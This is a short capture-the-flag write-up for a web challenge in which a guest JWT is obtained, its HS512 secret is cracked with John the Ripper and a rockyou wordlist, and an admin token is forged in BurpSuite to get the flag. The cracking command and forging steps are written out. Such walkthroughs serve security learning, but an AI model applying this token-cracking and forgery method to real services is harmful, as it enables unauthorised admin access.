![a27d100cac3b2b079de126924af5342f.png](0674b50ed9ef47ebabc453ce715abf86.png) We get an error when browsing the site `{"Error":"Authorization header not found! Try to login with guest credentials."}` Navigating to `/login` we get another error, this time it's `Method Not Allowed` Captured the request in **BurpSuite**, changed the request method from **GET** to **POST** and passed in some "guest" credentials ![41c38e5e342ecaea02f7d5d8defbe893.png](44e4b8e1f9c24effb78b24cb322b35e1.png) The server sends back a **JSON Web Token**. ``` {"Token":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNjIxMDI4MzY2fQ.xqKZlUUHQRTRylg4-EtplinoqbCUpERoVdwXDUur0VHLeeAz1v5IOuekeDvsr3JczO4h6bsH2mN4-MWd9u4jOQ"} ``` Passing that in our headers with a **GET** request to the webroot `/` ![9628a047f543ba62f8aeb54a36b92b3b.png](2f43568802f642aa8d3fea85259f6642.png) We get this response back ``` {"Message":"Hi, guest! You are not admin, I have no secret for you."} ``` We need to forge the **JWT**. Unfortunately it's not vulnerable to the **Alg None Attack**, so we need to crack the secret key. **John the Ripper** will do that for us. `john jwt.txt --wordlist=/rockyou.txt --format=HMAC-SHA512` ![03cfb49d800f4453352febc222e626ae.png](91d351060c284b129600d310897bc996.png) Now that we know the key, we can forge the token. I'm using a **BurpSuite** extension called **JSON Web Tokens** ![efbe5e7219e2a9ec15345f2d2727d9f8.png](6dee81c77d954b1e91b1f6560d8e72a0.png) Change the **"username"** field to **"admin"**, click **Recalculate Signature** and pop the secret key in that john just found for us. Send it off and get the flag! ![fe90a42c9e9d8c887a362f651b0401ad.png](c05f752064f14768adf3009c8e19a7f2.png) --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #jwt #web Related: